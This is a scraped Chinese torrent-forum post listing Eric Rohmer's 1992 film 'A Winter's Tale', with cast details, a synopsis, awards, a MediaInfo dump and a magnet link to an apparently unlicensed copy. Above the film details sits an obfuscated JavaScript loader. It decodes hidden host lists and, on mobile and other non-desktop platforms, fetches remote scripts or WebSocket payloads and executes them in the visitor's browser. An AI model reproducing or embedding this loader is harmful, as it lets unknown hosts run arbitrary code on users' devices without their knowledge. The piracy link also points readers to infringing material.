冬天的故事[简繁字幕].A.Winter's.Tale.1992.1080p.FriDay.WEB-DL.H264.AAC 3.11GB

版主小s 1月前 155

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 冬天的故事 / 人间四季冬 / 冬天故事 / A Winter's Tale
◎片  名 Conte d'hiver
◎年  代 1992
◎产  地 法国
◎类  别 剧情 / 爱情
◎语  言 法语
◎上映日期 1992-01-29(法国)
◎IMDb链接 https://www.imdb.com/title/tt0104008/
◎豆瓣评分 8.4/10 (23520人评价)
◎豆瓣链接 https://movie.douban.com/subject/1293388/
◎片  长 114分钟
◎导  演 埃里克·侯麦 éric Rohmer (id:1054406)
◎编  剧 埃里克·侯麦 éric Rohmer (id:1054406)
◎演  员 夏洛特·韦里 Charlotte Véry (id:1316061)
       弗里德里克·范登德里舍 Frédéric van den Driessche (id:1345709)
       米歇尔·瓦莱蒂 Michel Voletti (id:1345710)
       赫尔菲里克 Hervé Furic (id:1345725)
       让-克洛德·比埃特 Jean-Claude Biette (id:1042644)
       玛丽·里维埃 Marie Rivière (id:1037492)
       罗杰·杜马斯 Roger Dumas (id:1048462)
       达尼埃莱·莱布伦 Danièle Lebrun (id:1102803)
       戴安莱夫里耶 Diane Lepvrier (id:1123657)
       罗赛特 Rosette (id:1144379)
       玛格丽特·梅内格 Margaret Ménégoz (id:1292841)
       Luc Pagès Luc Pagès (id:1293811)
       雪美莲 Mary Stephen (id:1328982)
       Pierre-Jean Larroque Pierre-Jean Larroque (id:1289458)

◎标  签 法国 / 侯麦 / 爱情 / 法国电影 / 埃里克·侯麦 / 文艺 / 1992 / 冬天的故事

◎简  介
  侯麦著名系列作品“四季的故事”之一。菲利茜(夏洛特·海瑞 Charlotte Véry饰)和查理(费德瑞克·范丹狄德夏 Frédéric van den Driessche饰)在海边浪漫相恋之后,因为一时不留神留下了写错的地址,而导致了二人再也找不到彼此。菲利茜生下了查理的孩子,但5年来却再也没有查理的音讯。                                       
                                    生活还在继续,菲利茜遇上了喜欢她的一些男子,他们也不失为好男人,足够爱自己。比如成熟体贴的马桑(迈克尔·瓦雷蒂 Michael Voletti饰)和才华横溢的路易(Hervé Furic饰)。然而,在菲利茜的心中,查理却仍旧是个挥之不去的至爱之人。她不是不爱他们,只是无法爱到能和他们一起生活。她和路易一起看莎士比亚的歌剧《冬天的故事》,为里面的人物悄然落泪,也许她和剧中人一样,也在坚守着一个信念。                                       
                                    终于某个冬天,菲利茜和查理竟然在公车上重遇,执...

◎获奖情况 (共2项)
  第42届柏林国际电影节 (1992)
  金熊奖 最佳影片(提名)
   └──埃里克·侯麦 (id:1054406)
  费比西奖(国际影评人联盟奖) 竞赛单元最佳影片
   └──埃里克·侯麦 (id:1054406)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 62201602855114827263899698528191092185 (0x2ECB97CBC07209B6DF6876A39A6195D9)

  4. Complete name                            : A.Winter'[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 3.11 GiB

  8. Duration                                 : 1 h 54 min

  9. Overall bit rate                         : 3 908 kb/s

  10. Encoded date                             : UTC 2021-08-11 05:15:59

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 1 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 1 frame

  21. Format settings, GOP                     : M=1, N=60

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 54 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 3 780 kb/s

  26. Nominal bit rate                         : 4 000 kb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 29.970 (30000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.061

  37. Stream size                              : 3.01 GiB (97%)

  38. Language                                 : English

  39. Default                                  : Yes

  40. Forced                                   : No


  41. Audio

  42. ID                                       : 2

  43. Format                                   : AAC LC

  44. Format/Info                              : Advanced Audio Codec Low Complexity

  45. Codec ID                                 : A_AAC-2

  46. Duration                                 : 1 h 54 min

  47. Bit rate                                 : 125 kb/s

  48. Channel(s)                               : 2 channels

  49. Channel layout                           : L R

  50. Sampling rate                            : 48.0 kHz

  51. Frame rate                               : 46.875 FPS (1024 SPF)

  52. Compression mode                         : Lossy

  53. Stream size                              : 102 MiB (3%)

  54. Language                                 : French

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Text #1

  58. ID                                       : 3

  59. Format                                   : UTF-8

  60. Codec ID                                 : S_TEXT/UTF8

  61. Codec ID/Info                            : UTF-8 Plain Text

  62. Duration                                 : 1 h 52 min

  63. Bit rate                                 : 55 b/s

  64. Count of elements                        : 1766

  65. Stream size                              : 45.6 KiB (0%)

  66. Title                                    : Chinese Simplified

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No


  70. Text #2

  71. ID                                       : 4

  72. Format                                   : UTF-8

  73. Codec ID                                 : S_TEXT/UTF8

  74. Codec ID/Info                            : UTF-8 Plain Text

  75. Duration                                 : 1 h 52 min

  76. Bit rate                                 : 55 b/s

  77. Count of elements                        : 1766

  78. Stream size                              : 45.6 KiB (0%)

  79. Title                                    : Chinese Traditional

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:19AE4C6C000BB52E0BBF8560151466BAF419572B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回